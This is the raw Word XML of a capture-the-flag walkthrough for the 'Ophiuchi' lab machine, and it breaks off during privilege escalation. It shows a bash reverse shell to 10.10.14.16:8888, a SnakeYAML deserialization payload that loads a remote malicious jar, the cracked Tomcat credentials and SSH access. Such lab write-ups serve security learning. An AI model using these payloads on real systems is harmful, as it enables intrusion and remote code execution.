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5409" w:rsidRDefault="00FB3A4D">
      <w:r w:rsidRPr="00FB3A4D">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5637530" cy="3068955"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="1" name="Picture 1" descr="C:\Users\saksh\OneDrive\Desktop\c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ksh\OneDrive\Desktop\card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A4D" w:rsidRDefault="00FB3A4D"/>
    <w:p w:rsidR="00FB3A4D" w:rsidRDefault="007E041B">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03794FB3" wp14:editId="0C9DA993">
            <wp:extent cx="5731510" cy="20199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41B" w:rsidRDefault="007E041B"/>
    <w:p w:rsidR="007E041B" w:rsidRDefault="00A1084D">
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidR="00A61E22" w:rsidRPr="004D63F2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.10.10.227:8080/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00A61E22" w:rsidRDefault="00D861DF">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="603DE6FC" wp14:editId="17569D33">
            <wp:extent cx="5731510" cy="33750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1DF" w:rsidRDefault="00D861DF"/>
    <w:p w:rsidR="002B0029" w:rsidRDefault="002B0029" w:rsidP="002B0029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D861DF" w:rsidRDefault="002B0029" w:rsidP="002B0029">
      <w:r>
        <w:t xml:space="preserve">└─# echo "10.10.10.227 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ophiuchi.htb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" &gt;&gt; /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B0029" w:rsidRDefault="00B9377D" w:rsidP="002B0029">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F4A505D" wp14:editId="1829915B">
            <wp:extent cx="4086225" cy="476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7D" w:rsidRDefault="00B9377D" w:rsidP="002B0029"/>
    <w:p w:rsidR="004C14D7" w:rsidRDefault="004C14D7" w:rsidP="004C14D7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B9377D" w:rsidRDefault="004C14D7" w:rsidP="004C14D7">
      <w:r>
        <w:t xml:space="preserve">└─# git clone </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="004D63F2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/artsploit/yaml-payload</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="004C14D7" w:rsidRDefault="00667A94" w:rsidP="004C14D7">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29002212" wp14:editId="50595D8E">
            <wp:extent cx="4962525" cy="1047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A94" w:rsidRDefault="00667A94" w:rsidP="004C14D7"/>
    <w:p w:rsidR="00CD44CE" w:rsidRDefault="00CD44CE" w:rsidP="00CD44CE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kali)-[/home/kali/Downloads/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>yaml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-payload]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD44CE" w:rsidRDefault="00BF0230" w:rsidP="00CD44CE">
      <w:r>
        <w:t>└─# cat rev</w:t>
      </w:r>
      <w:r w:rsidR="00CD44CE">
        <w:t xml:space="preserve">.sh           </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD44CE" w:rsidRDefault="00CD44CE" w:rsidP="00CD44CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>#!/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00CD44CE" w:rsidRDefault="00CD44CE" w:rsidP="00CD44CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>bash</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt;&amp; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/10.10.14.16/8888 0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD6A54" w:rsidRDefault="001F748C" w:rsidP="00224AEA">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B7813D9" wp14:editId="5F0B394E">
            <wp:extent cx="4286250" cy="552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7D" w:rsidRDefault="00AB127D" w:rsidP="00224AEA"/>
    <w:p w:rsidR="007C221E" w:rsidRDefault="007C221E" w:rsidP="007C221E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kali)-[/home/kali/Downloads/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>yaml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-payload/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00667A94" w:rsidRDefault="007C221E" w:rsidP="007C221E">
      <w:r>
        <w:t xml:space="preserve">└─# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gedit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>artsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/AwesomeScriptEngineFactory.java</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C221E" w:rsidRDefault="00BF0230" w:rsidP="007C221E">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7878D436" wp14:editId="0F7C6AF7">
            <wp:extent cx="5731510" cy="22485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A92" w:rsidRDefault="00581A92" w:rsidP="006A1563"/>
    <w:p w:rsidR="00A108C2" w:rsidRDefault="00A108C2" w:rsidP="00A108C2">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>root@osboxes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:~/Downloads/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>yaml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-payload# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>javac</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>artsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/AwesomeScriptEngineFactory.java</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A108C2" w:rsidRDefault="00A108C2" w:rsidP="00A108C2">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>root@osboxes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:~/Downloads/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>yaml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-payload# jar -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cvf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> yaml-payload.jar -C </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>/ .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00A108C2" w:rsidRDefault="006D5BD5" w:rsidP="00A108C2">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5047DF45" wp14:editId="23F080CB">
            <wp:extent cx="5731510" cy="111696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F7" w:rsidRDefault="00C934F7" w:rsidP="00C934F7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AB50F3" w:rsidRDefault="006D5BD5" w:rsidP="00AB50F3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2B7428AC" wp14:editId="613B469F">
            <wp:extent cx="5731510" cy="4191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F3" w:rsidRDefault="00AB50F3" w:rsidP="00AB50F3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984076" w:rsidRDefault="00984076" w:rsidP="00AB50F3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CD44CE" w:rsidRDefault="006D5BD5" w:rsidP="00AB50F3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3554030C" wp14:editId="7A7D4928">
            <wp:extent cx="3819525" cy="4762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4CE" w:rsidRDefault="00CD44CE" w:rsidP="00AB50F3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CD44CE" w:rsidRDefault="00CD44CE" w:rsidP="00AB50F3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BD6A54" w:rsidRDefault="00BD6A54" w:rsidP="00AB50F3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Now we go to browser</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD6A54" w:rsidRDefault="00BD6A54" w:rsidP="00AB50F3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BD6A54" w:rsidRDefault="00BD6A54" w:rsidP="00BD6A54">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ot"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>!!</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ot"/>
        </w:rPr>
        <w:t>javax.script.ScriptEngineManager</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="at"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="kw"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD6A54" w:rsidRDefault="00BD6A54" w:rsidP="00BD6A54">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="at"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ot"/>
        </w:rPr>
        <w:t>!!</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ot"/>
        </w:rPr>
        <w:t>java.net.URLClassLoader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="at"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="kw"/>
        </w:rPr>
        <w:t>[[</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD6A54" w:rsidRDefault="00BD6A54" w:rsidP="00BD6A54">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="at"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ot"/>
        </w:rPr>
        <w:t>!!java.net.URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="at"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="kw"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="st"/>
        </w:rPr>
        <w:t>"http://10.10.14.16/yaml-payload.jar"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="kw"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD6A54" w:rsidRDefault="00BD6A54" w:rsidP="00BD6A54">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="at"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="kw"/>
        </w:rPr>
        <w:t>]]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD6A54" w:rsidRDefault="00BD6A54" w:rsidP="00BD6A54">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="kw"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD6A54" w:rsidRDefault="00BD6A54" w:rsidP="00AB50F3">
      <w:pPr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:rsidR="0035462F" w:rsidRDefault="00E37CDD" w:rsidP="0035462F">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EA6C908" wp14:editId="4AB0FBF9">
            <wp:extent cx="5731510" cy="42138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CDD" w:rsidRDefault="00E37CDD" w:rsidP="0035462F"/>
    <w:p w:rsidR="00E37CDD" w:rsidRDefault="00E37CDD" w:rsidP="0035462F"/>
    <w:p w:rsidR="0035462F" w:rsidRDefault="006D5BD5" w:rsidP="006A1563">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40912DEE" wp14:editId="7A4F927D">
            <wp:extent cx="5731510" cy="7340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D5" w:rsidRDefault="006D5BD5" w:rsidP="006A1563"/>
    <w:p w:rsidR="006D5BD5" w:rsidRDefault="006D5BD5" w:rsidP="006A1563">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="425D12D9" wp14:editId="4763EF34">
            <wp:extent cx="5731510" cy="9264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BD5" w:rsidRDefault="006D5BD5" w:rsidP="006A1563"/>
    <w:p w:rsidR="00281A76" w:rsidRDefault="000701CF" w:rsidP="006A1563">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000701CF">
        <w:t>tomcat@ophiuchi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000701CF">
        <w:t>:/$ cd /opt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000701CF" w:rsidRDefault="000701CF" w:rsidP="006A1563">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000701CF">
        <w:t>tomcat@ophiuchi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000701CF">
        <w:t xml:space="preserve">:/opt$ ls </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000701CF">
        <w:t>lrt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="000701CF" w:rsidRDefault="000701CF" w:rsidP="006A1563">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D8CCE4C" wp14:editId="6EE7C140">
            <wp:extent cx="5105400" cy="14001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1CF" w:rsidRDefault="000701CF" w:rsidP="006A1563"/>
    <w:p w:rsidR="000701CF" w:rsidRDefault="00E53478" w:rsidP="006A1563">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53478">
        <w:t>tomcat@ophiuchi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53478">
        <w:t>:/opt$ cd tomcat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E53478" w:rsidRDefault="00E53478" w:rsidP="006A1563">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53478">
        <w:t>tomcat@ophiuchi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53478">
        <w:t xml:space="preserve">:~$ ls </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53478">
        <w:t>lrt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00E53478" w:rsidRDefault="00E53478" w:rsidP="006A1563">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53478">
        <w:t>tomcat@ophiuchi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53478">
        <w:t xml:space="preserve">:~$ cd </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53478">
        <w:t>conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00E53478" w:rsidRDefault="00E53478" w:rsidP="006A1563">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61F528A8" wp14:editId="5F01B1E3">
            <wp:extent cx="5562600" cy="36290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478" w:rsidRDefault="00E53478" w:rsidP="006A1563"/>
    <w:p w:rsidR="00E53478" w:rsidRDefault="00C61628" w:rsidP="006A1563">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C61628">
        <w:t>tomcat@ophiuchi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C61628">
        <w:t>:~/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C61628">
        <w:t>conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C61628">
        <w:t xml:space="preserve">$ ls </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C61628">
        <w:t>lrt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="006122B6" w:rsidRDefault="006122B6" w:rsidP="006A1563">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B816DA1" wp14:editId="63B72603">
            <wp:extent cx="5731510" cy="21596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B6" w:rsidRDefault="006122B6" w:rsidP="006A1563"/>
    <w:p w:rsidR="00C61628" w:rsidRDefault="00C61628" w:rsidP="006A1563">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C61628">
        <w:t>tomcat@ophiuchi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C61628">
        <w:t>:~/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C61628">
        <w:t>conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C61628">
        <w:t>$ cat tomcat-users.xml</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C61628" w:rsidRDefault="006122B6" w:rsidP="006A1563">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="528C73ED" wp14:editId="0C07330A">
            <wp:extent cx="5731510" cy="2159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B6" w:rsidRDefault="006122B6" w:rsidP="006A1563"/>
    <w:p w:rsidR="006122B6" w:rsidRDefault="003D5A21" w:rsidP="006A1563">
      <w:r>
        <w:t xml:space="preserve">So here </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D5A21" w:rsidRDefault="003D5A21" w:rsidP="006A1563"/>
    <w:p w:rsidR="003D5A21" w:rsidRDefault="003D5A21" w:rsidP="006A1563">
      <w:r>
        <w:t>Username: admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D5A21" w:rsidRDefault="003D5A21" w:rsidP="006A1563">
      <w:r>
        <w:t xml:space="preserve">Password: </w:t>
      </w:r>
      <w:r w:rsidRPr="003D5A21">
        <w:t>whythereisalimit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D5A21" w:rsidRDefault="003D5A21" w:rsidP="006A1563"/>
    <w:p w:rsidR="003D5A21" w:rsidRDefault="002140E9" w:rsidP="006A1563">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002140E9">
        <w:t>root@osboxes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002140E9">
        <w:t>:~/Downloads/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002140E9">
        <w:t>yaml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002140E9">
        <w:t xml:space="preserve">-payload# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002140E9">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002140E9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r w:rsidRPr="004D63F2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>admin@10.10.10.227</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="002140E9" w:rsidRDefault="00B66743" w:rsidP="006A1563">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FAEB5EE" wp14:editId="46F3D81E">
            <wp:extent cx="5731510" cy="483362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43" w:rsidRDefault="00B66743" w:rsidP="006A1563"/>
    <w:p w:rsidR="00B66743" w:rsidRDefault="007412C4" w:rsidP="006A1563">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35F7D17A" wp14:editId="030A2687">
            <wp:extent cx="4724400" cy="14954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2C4" w:rsidRDefault="007412C4" w:rsidP="006A1563"/>
    <w:p w:rsidR="007412C4" w:rsidRDefault="004C1EB3" w:rsidP="006A1563">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004C1EB3">
        <w:t>admin@ophiuchi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004C1EB3">
        <w:t xml:space="preserve">:~$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004C1EB3">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004C1EB3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="004C1EB3">
        <w:t>l</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C1EB3" w:rsidRDefault="004C1EB3" w:rsidP="006A1563">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004C1EB3">
        <w:t>admin@ophiuchi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004C1EB3">
        <w:t>:~$ cat /opt/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004C1EB3">
        <w:t>wasm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004C1EB3">
        <w:t>-functions/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004C1EB3">
        <w:t>index.go</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="004C1EB3" w:rsidRDefault="004C1EB3" w:rsidP="006A1563">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E4C35BF" wp14:editId="3DC002F9">
            <wp:extent cx="5731510" cy="33972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EB3" w:rsidRDefault="004C1EB3" w:rsidP="006A1563"/>
    <w:p w:rsidR="003E2989" w:rsidRDefault="003E2989" w:rsidP="003E2989">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>admin@ophiuchi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:~$ cd /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="003E2989" w:rsidRDefault="003E2989" w:rsidP="003E2989">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>admin@ophiuchi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mkdir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> work &amp;&amp; cd work</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E2989" w:rsidRDefault="003E2989" w:rsidP="003E2989">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>admin@ophiuchi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/work$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>opt/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wasm</w:t>
      </w:r>
